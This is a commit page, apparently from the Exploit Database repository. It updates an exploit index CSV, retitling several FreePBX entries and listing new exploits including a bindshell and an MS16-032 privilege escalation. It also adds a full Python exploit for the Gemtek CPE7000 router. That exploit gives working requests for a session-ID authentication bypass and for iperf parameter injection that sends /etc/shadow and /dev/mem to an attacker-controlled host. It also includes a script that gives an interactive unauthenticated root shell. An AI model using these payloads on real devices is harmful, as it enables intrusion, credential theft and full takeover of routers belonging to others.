Skip to content

Commit 22a4c5d

Browse files
author
Offensive Security
committed
DB: 2016-04-22
5 new exploits freePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability FreePBX 2.1.3 - (upgrade.php) Remote File Include Vulnerability FreePBX <= 2.8.0 Recordings Interface Allows Remote Code Execution FreePBX <= 2.8.0 - Recordings Interface Allows Remote Code Execution FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution FreePBX 2.10.0 / 2.9.0 - callmenum Remote Code Execution FreePBX 2.2 SIP Packet Multiple HTML Injection Vulnerabilities FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities FreePBX config.php Remote Code Execution FreePBX - config.php Remote Code Execution FreePBX 2.5.2 admin/config.php tech Parameter XSS FreePBX 2.5.2 Zap Channel Addition Description Parameter XSS FreePBX 2.5.2 - admin/config.php tech Parameter XSS FreePBX 2.5.2 - Zap Channel Addition Description Parameter XSS phpLiteAdmin 1.9.6 - Multiple Vulnerabilities Symantec Brightmail 10.6.0-7- LDAP Credentials Disclosure Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities Linux/x86_64 - bindshell (Port 5600) - 86 bytes Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (Powershell)
1 parent bd5d486 commit 22a4c5d

6 files changed

Lines changed: 1774 additions & 7 deletions

File tree

files.csv

Lines changed: 12 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -2355,7 +2355,7 @@ id,file,description,date,author,platform,type,port
23552355
2662,platforms/asp/webapps/2662.txt,"Hosting Controller <= 6.1 Hotfix 3.2 - Remote Unauthenticated Vulnerabilities",2006-10-27,"Soroush Dalili",asp,webapps,0
23562356
2663,platforms/php/webapps/2663.txt,"PhpShop Core <= 0.9.0 RC1 - (PS_BASE) File Include Vulnerabilities",2006-10-28,"Cold Zero",php,webapps,0
23572357
2664,platforms/php/webapps/2664.pl,"PHPMyDesk 1.0beta (viewticket.php) Local Include Exploit",2006-10-28,Kw3[R]Ln,php,webapps,0
2358-
2665,platforms/php/webapps/2665.txt,"freePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability",2006-10-28,"Mehmet Ince",php,webapps,0
2358+
2665,platforms/php/webapps/2665.txt,"FreePBX 2.1.3 - (upgrade.php) Remote File Include Vulnerability",2006-10-28,"Mehmet Ince",php,webapps,0
23592359
2666,platforms/php/webapps/2666.txt,"mp3SDS 3.0 (Core/core.inc.php) Remote File Include Vulnerability",2006-10-28,"Mehmet Ince",php,webapps,0
23602360
2667,platforms/php/webapps/2667.txt,"Electronic Engineering Tool (EE TOOL) <= 0.4.1 File Include Vulnerability",2006-10-28,"Mehmet Ince",php,webapps,0
23612361
2668,platforms/php/webapps/2668.htm,"MiraksGalerie <= 2.62 (pcltar.lib.php) Remote File Include Exploit",2006-10-28,ajann,php,webapps,0
@@ -13155,7 +13155,7 @@ id,file,description,date,author,platform,type,port
1315513155
15093,platforms/php/webapps/15093.txt,"Collaborative Passwords Manager 1.07 - Multiple Local Include Vulnerabilities",2010-09-24,sh00t0ut,php,webapps,0
1315613156
15094,platforms/windows/local/15094.py,"Microsoft Excel - OBJ Record Stack Overflow",2010-09-24,Abysssec,windows,local,0
1315713157
15096,platforms/windows/dos/15096.py,"Microsoft MPEG Layer-3 Audio Decoder - Division By Zero",2010-09-24,Abysssec,windows,dos,0
13158-
15098,platforms/php/webapps/15098.txt,"FreePBX <= 2.8.0 Recordings Interface Allows Remote Code Execution",2010-09-24,"Trustwave's SpiderLabs",php,webapps,0
13158+
15098,platforms/php/webapps/15098.txt,"FreePBX <= 2.8.0 - Recordings Interface Allows Remote Code Execution",2010-09-24,"Trustwave's SpiderLabs",php,webapps,0
1315913159
15114,platforms/php/webapps/15114.php,"Zenphoto - Config Update and Command Execute Vulnerability",2010-09-26,Abysssec,php,webapps,0
1316013160
15102,platforms/win32/webapps/15102.txt,"Traidnt UP - Cross-Site Request Forgery Add Admin Account",2010-09-24,"John Johnz",win32,webapps,80
1316113161
15103,platforms/windows/dos/15103.py,"VMware Workstation <= 7.1.1 VMkbd.sys Denial of Service Exploit",2010-09-25,"Lufeng Li",windows,dos,0
@@ -16169,7 +16169,7 @@ id,file,description,date,author,platform,type,port
1616916169
18657,platforms/windows/local/18657.pl,"mmPlayer 2.2 - (.ppl) Local Buffer Overflow Exploit (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0
1617016170
18695,platforms/windows/remote/18695.py,"Sysax <= 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0
1617116171
18658,platforms/windows/remote/18658.rb,"Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow_",2012-03-24,metasploit,windows,remote,0
16172-
18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution",2012-03-24,metasploit,php,webapps,0
16172+
18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 - callmenum Remote Code Execution",2012-03-24,metasploit,php,webapps,0
1617316173
18660,platforms/php/webapps/18660.txt,"RIPS <= 0.53 - Multiple Local File Inclusion Vulnerabilities",2012-03-24,localh0t,php,webapps,0
1617416174
18661,platforms/windows/dos/18661.txt,"RealPlayer .mp4 file handling memory corruption",2012-03-24,"Senator of Pirates",windows,dos,0
1617516175
18676,platforms/php/webapps/18676.txt,"boastMachine <= 3.1 - CSRF Add Admin Vulnerability",2012-03-28,Dr.NaNo,php,webapps,0
@@ -26981,7 +26981,7 @@ id,file,description,date,author,platform,type,port
2698126981
29870,platforms/php/webapps/29870.txt,"Exponent CMS 0.96.5/ 0.96.6 magpie_debug.php url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0
2698226982
29871,platforms/php/webapps/29871.txt,"Exponent CMS 0.96.5/ 0.96.6 magpie_slashbox.php rss_url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0
2698326983
29872,platforms/php/webapps/29872.txt,"Exponent CMS 0.96.5/ 0.96.6 iconspopup.php icodir Variable Traversal Arbitrary Directory Listing",2007-04-20,"Hamid Ebadi",php,webapps,0
26984-
29873,platforms/multiple/remote/29873.php,"FreePBX 2.2 SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,multiple,remote,0
26984+
29873,platforms/multiple/remote/29873.php,"FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,multiple,remote,0
2698526985
29874,platforms/php/webapps/29874.txt,"PHP Turbulence 0.0.1 Turbulence.PHP Remote File Include Vulnerability",2007-04-20,Omni,php,webapps,0
2698626986
29875,platforms/multiple/dos/29875.py,"AMSN 0.96 - Malformed Message Denial of Service Vulnerability",2007-04-21,"Levent Kayan",multiple,dos,0
2698726987
29876,platforms/php/webapps/29876.txt,"TJSChat 0.95 You.PHP Cross-Site Scripting Vulnerability",2007-04-23,the_Edit0r,php,webapps,0
@@ -27497,7 +27497,7 @@ id,file,description,date,author,platform,type,port
2749727497
32417,platforms/php/remote/32417.php,"PHP 5.2.6 - 'create_function()' Code Injection Weakness (2)",2008-09-25,80sec,php,remote,0
2749827498
32416,platforms/php/remote/32416.php,"PHP 5.2.6 - 'create_function()' Code Injection Weakness (1)",2008-09-25,80sec,php,remote,0
2749927499
32415,platforms/php/webapps/32415.txt,"Drupal Ajax Checklist 5.x-1.0 Module Multiple SQL Injection Vulnerabilities",2008-09-24,"Justin C. Klein Keane",php,webapps,0
27500-
32512,platforms/unix/remote/32512.rb,"FreePBX config.php Remote Code Execution",2014-03-25,metasploit,unix,remote,0
27500+
32512,platforms/unix/remote/32512.rb,"FreePBX - config.php Remote Code Execution",2014-03-25,metasploit,unix,remote,0
2750127501
32413,platforms/php/webapps/32413.txt,"InterTech WCMS 'etemplate.php' SQL Injection Vulnerability",2008-09-23,"GeNiUs IrAQI",php,webapps,0
2750227502
32412,platforms/asp/webapps/32412.txt,"Omnicom Content Platform 'browser.asp' Parameter Directory Traversal Vulnerability",2008-09-23,AlbaniaN-[H],asp,webapps,0
2750327503
32411,platforms/php/webapps/32411.txt,"Datalife Engine CMS 7.2 - 'admin.php' Cross-Site Scripting Vulnerability",2008-09-23,"Hadi Kiamarsi",php,webapps,0
@@ -30153,8 +30153,8 @@ id,file,description,date,author,platform,type,port
3015330153
33439,platforms/php/webapps/33439.txt,"MyBB 1.4.10 - 'myps.php' Cross-Site Scripting Vulnerability",2009-12-24,"Steven Abbagnaro",php,webapps,0
3015430154
33440,platforms/php/webapps/33440.txt,"Joomla! iF Portfolio Nexus 'controller' Parameter Remote File Include Vulnerability",2009-12-29,F10riX,php,webapps,0
3015530155
33441,platforms/php/webapps/33441.txt,"Joomla! Joomulus Component 2.0 - 'tagcloud.swf' Cross-Site Scripting Vulnerability",2009-12-28,MustLive,php,webapps,0
30156-
33442,platforms/php/webapps/33442.txt,"FreePBX 2.5.2 admin/config.php tech Parameter XSS",2009-12-28,Global-Evolution,php,webapps,0
30157-
33443,platforms/php/webapps/33443.txt,"FreePBX 2.5.2 Zap Channel Addition Description Parameter XSS",2009-12-28,Global-Evolution,php,webapps,0
30156+
33442,platforms/php/webapps/33442.txt,"FreePBX 2.5.2 - admin/config.php tech Parameter XSS",2009-12-28,Global-Evolution,php,webapps,0
30157+
33443,platforms/php/webapps/33443.txt,"FreePBX 2.5.2 - Zap Channel Addition Description Parameter XSS",2009-12-28,Global-Evolution,php,webapps,0
3015830158
33444,platforms/php/webapps/33444.txt,"DrBenHur.com DBHcms 1.1.4 - 'dbhcms_core_dir' Parameter Remote File Include Vulnerability",2009-12-28,Securitylab.ir,php,webapps,0
3015930159
33445,platforms/php/webapps/33445.txt,"phpInstantGallery 1.1 - 'admin.php' Cross-Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0
3016030160
33446,platforms/php/webapps/33446.txt,"Barbo91 - 'upload.php' Cross-Site Scripting Vulnerability",2009-12-25,indoushka,php,webapps,0
@@ -35931,3 +35931,8 @@ id,file,description,date,author,platform,type,port
3593135931
39711,platforms/php/webapps/39711.php,"PHPBack 1.3.0 - SQL Injection",2016-04-20,hyp3rlinx,php,webapps,80
3593235932
39712,platforms/win64/dos/39712.txt,"Windows Kernel - DrawMenuBarTemp Wild-Write (MS16-039)",2016-04-20,"Nils Sommer",win64,dos,0
3593335933
39713,platforms/windows/dos/39713.c,"Hyper-V - vmswitch.sys VmsMpCommonPvtHandleMulticastOids Guest to Host Kernel-Pool Overflow",2016-04-20,"Google Security Research",windows,dos,0
35934+
39714,platforms/php/webapps/39714.txt,"phpLiteAdmin 1.9.6 - Multiple Vulnerabilities",2016-04-21,"Ozer Goker",php,webapps,80
35935+
39715,platforms/java/webapps/39715.rb,"Symantec Brightmail 10.6.0-7- LDAP Credentials Disclosure",2016-04-21,"Fakhir Karim Reda",java,webapps,443
35936+
39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443
35937+
39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86_64 - bindshell (Port 5600) - 86 bytes",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0
35938+
39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (Powershell)",2016-04-21,b33f,windows,local,0
Lines changed: 227 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,227 @@
1+
#!/usr/bin/python
2+
3+
'''
4+
# Exploit Title: Gemtek CPE7000 / WLTCS-106 multiple vulnerabilities
5+
# Date: 04/06/2016
6+
# Exploit Author: Federico Ramondino - framondino[0x40]mentat[0x2e]is
7+
# Vendor Homepage: gemtek.com.tw
8+
# Version: Firmware Version 01.01.02.082
9+
# Tested on:
10+
# Product Name : CPE7000
11+
# Model ID : WLTCS-106
12+
# Hardware Version : V02A
13+
# Firmware Version : 01.01.02.082
14+
15+
1) SID leak / auth bypass
16+
The sysconfg cgi application leaks a valid "SID" (session id) when the
17+
following unauthenticated request is made:
18+
Request: GET /cgi-bin/sysconf.cgi?page=ajax.asp&action=login_confirm HTTP/1.1
19+
20+
The response body has the form: <checkcode>,<sid>
21+
Example resp: RJIi,BtsS2OdhcVSbviDC5iMa1MKeo9rbrgdQ
22+
23+
The sid thus obtained can be used to "unlock" the cliend-side administration
24+
interface and/or to directly issue request that are usually restricted to
25+
administrative accounts.
26+
27+
POCs:
28+
29+
I) Unauthenticated remote reboot:
30+
Request:
31+
/cgi-bin/sysconf.cgi?page=ajax_check.asp&action=reboot&reason=1&sid=<SID>
32+
33+
II) Web admin interface access. Add a new cookie with the following values:
34+
userlevel=2
35+
sid=<sid>
36+
37+
--------------------------------------------------------------------------------
38+
39+
2) Arbitrary file download - with root privileges - via iperf tool
40+
One of the diagnostic tools available on the device can be used to read an
41+
arbitrary file on the device. The sysconfg cgi application fails to sanitize
42+
user input, allowing an attacker to hijack the command issued to the "iperf"
43+
binary, a commonly-used network testing tool that can create TCP and UDP data
44+
streams and measure the throughput of a network that is carrying them.
45+
46+
The client-side validation can be easily bypassed by changing the javascript
47+
validation code, or by directly sending a forged request to the server.
48+
The iperf tool is run with the -c switch, meaning that it is behaving as a
49+
client that sends data to a server. By adding the -F parameter, iperf is forced
50+
to read data from a file instead of generating random data to be sent during the
51+
measurement.
52+
53+
This attack needs 2 step in order to take advantage of the vulnerability.
54+
The first request sets up the command be to run, the second one (a.k.a. toggle)
55+
actually runs the command (check the response body, 1 means running, 0 means stopped).
56+
57+
The following "SETUP" request can be used to set the correct parameters:
58+
/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
59+
p=X.X.X.X&perf_measure_server_port=YYYY&perf_measure_cpe_port=5554&perf_measure_
60+
test_time=ZZ&perf_measure_protocol_type=1&perf_measure_packet_data_length=1024&
61+
perf_measure_bandwidth=19m&perf_measure_client_num=1%20-F%20 <URLENCODED PATH TO
62+
FILE>
63+
64+
Parameters breakdown:
65+
XXX.XXX.XXX.XXX = attacker ip
66+
YYYY = attacker listening port
67+
zz = time limit
68+
Note: nc is enough to capture data, which may be sent with some additional
69+
header and footer introduced by iperf's protocol
70+
71+
In order to run iperf, the following "TOGGLE" (run/stop) request must be sent:
72+
/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle
73+
74+
75+
POCs:
76+
I) download of /etc/shadow
77+
SETUP REQUEST:
78+
/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
79+
p=X.X.X.X&perf_measure_server_port=YYYY&perf_measure_cpe_port=5554&perf_measure_
80+
test_time=30&perf_measure_protocol_type=1&perf_measure_packet_data_length=1024&p
81+
erf_measure_bandwidth=19m&perf_measure_client_num=1%20-F%20%2fetc%2fshadow
82+
83+
RUN/STOP(Toggle) REQUEST:
84+
/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle
85+
86+
87+
II) download of device physical memory (/dev/mem) with increased perf_measure_test_time:
88+
SETUP REQUEST:
89+
/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
90+
p=X.X.X.X&perf_measure_server_port=YYYY&perf_measure_cpe_port=5554&perf_measure_
91+
test_time=6000&perf_measure_protocol_type=1&perf_measure_packet_data_length=1024
92+
&perf_measure_bandwidth=19m&perf_measure_client_num=1%20-F%20%2fdev%2fmem
93+
94+
RUN/STOP(Toggle) REQUEST:
95+
/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle
96+
97+
--------------------------------------------------------------------------------
98+
99+
3) Unauthenticated remote root command execution
100+
The same vulnerability can be used to issue an arbitrary command on the device.
101+
The command executed on the system to run the diagnostic tool is constructed
102+
using the sprintf function and the following format string, with no additional
103+
checks:
104+
105+
iperf -c "%s" -p %s -t %s -l %s -b %s -L %s -r -u > /tmp/iperf.txt &
106+
107+
It is therefore possible to insert another command by injecting it in the
108+
"perf_measure_server_ip" parameter and commenting out the rest of the original
109+
command.
110+
111+
To concatenate a command, the string in the first half before the injection
112+
point ( iperf -c " ) must be correctly closed with quotes ( " ).
113+
Then the new command can be added, preceded by a semicolon ( ; ).
114+
Finally, the other part of the original command after the "injection point"
115+
must be commented out ( # ).
116+
117+
iperf -c ""; <NEWCMD> #" -p %s -t %s -l %s -b %s -L %s -r -u > /tmp/iperf.txt &
118+
119+
120+
SETUP REQUEST:
121+
/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
122+
p=%22%3b%20<COMMAND_HERE>%20%23&perf_measure_server_port=5555&perf_measure_cpe_p
123+
ort=5554&perf_measure_test_time=60&perf_measure_protocol_type=1&perf_measure_pac
124+
ket_data_length=1024&perf_measure_bandwidth=19m&perf_measure_client_num=1
125+
126+
RUN/STOP(Toggle) REQUEST:
127+
/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle
128+
129+
130+
POC (echo test > /www/test):
131+
/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
132+
p=%22%3b%20echo%20test%20%3E%20%2fwww%2ftest%20%23&perf_measure_server_port=5555
133+
&perf_measure_cpe_port=5554&perf_measure_test_time=60&perf_measure_protocol_type
134+
=1&perf_measure_packet_data_length=1024&perf_measure_bandwidth=19m&perf_measure_
135+
client_num=1
136+
137+
and toggle:
138+
/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle
139+
140+
--------------------------------------------------------------------------------
141+
142+
Remediation:
143+
Disable wan access to the management web interface until an updated firmware is released.
144+
145+
More information and a detailed how-to is available at: http://www.mentat.is/docs/cpe7000-multiple-vulns.html
146+
'''
147+
148+
#Gemtek CPE7000 / WLTCS-106 remote root command execution
149+
#Author: Federico Ramondino - framondino[0x40]mentat[0x2e]is
150+
# Tested on:
151+
# Product Name : CPE7000
152+
# Model ID : WLTCS-106
153+
# Hardware Version : V02A
154+
# Firmware Version : 01.01.02.082
155+
156+
import httplib
157+
import ssl
158+
import urllib
159+
import time
160+
import sys
161+
import getopt
162+
import socket
163+
164+
ssl._create_default_https_context = ssl._create_unverified_context
165+
166+
host=''
167+
port = 443
168+
169+
def check():
170+
try:
171+
conn = httplib.HTTPSConnection(host +":"+str(port), timeout=10)
172+
conn.request("GET", "/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1")
173+
r1 = conn.getresponse()
174+
if r1.status != 200:
175+
return False
176+
return True
177+
except socket.error as msg:
178+
print "Cannot connect";
179+
sys.exit();
180+
181+
182+
def sendcmd( cmd ):
183+
resource = '"; ' + cmd + ' &> /www/cmdoutput.txt #'
184+
urlencoded = urllib.quote_plus(resource)
185+
cmdresource = "/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_ip=" +urlencoded + "&perf_measure_server_port=5555&perf_measure_cpe_port=5554&perf_measure_test_time=60&perf_measure_protocol_type=1&perf_measure_packet_data_length=1024&perf_measure_bandwidth=19m&perf_measure_client_num=1"
186+
res = makereq (cmdresource)
187+
res =makereq ("/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle")
188+
if(res!="1"):
189+
res =makereq ("/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle")
190+
time.sleep(1)
191+
res = makereq ("/cmdoutput.txt")
192+
print res
193+
194+
195+
def makereq (resource):
196+
conn = httplib.HTTPSConnection(host +":"+str(port))
197+
conn.request("GET", resource)
198+
r1 = conn.getresponse()
199+
body = r1.read()
200+
return body
201+
202+
203+
if len(sys.argv) < 2:
204+
print 'GemtekShell.py <host> [<port> (443)]'
205+
exit()
206+
elif len(sys.argv) > 2:
207+
port = sys.argv[2]
208+
209+
host = sys.argv[1]
210+
211+
print 'Connecting to ', host, port
212+
213+
if not check() :
214+
print "Host seems not vulnerable"
215+
sys.exit()
216+
217+
218+
while(1):
219+
cmd = raw_input("gemtekCMD> ")
220+
if cmd.strip() != "quit" :
221+
sendcmd(cmd)
222+
else :
223+
sys.exit()
224+
225+
226+
227+

0 commit comments

Comments
 (0)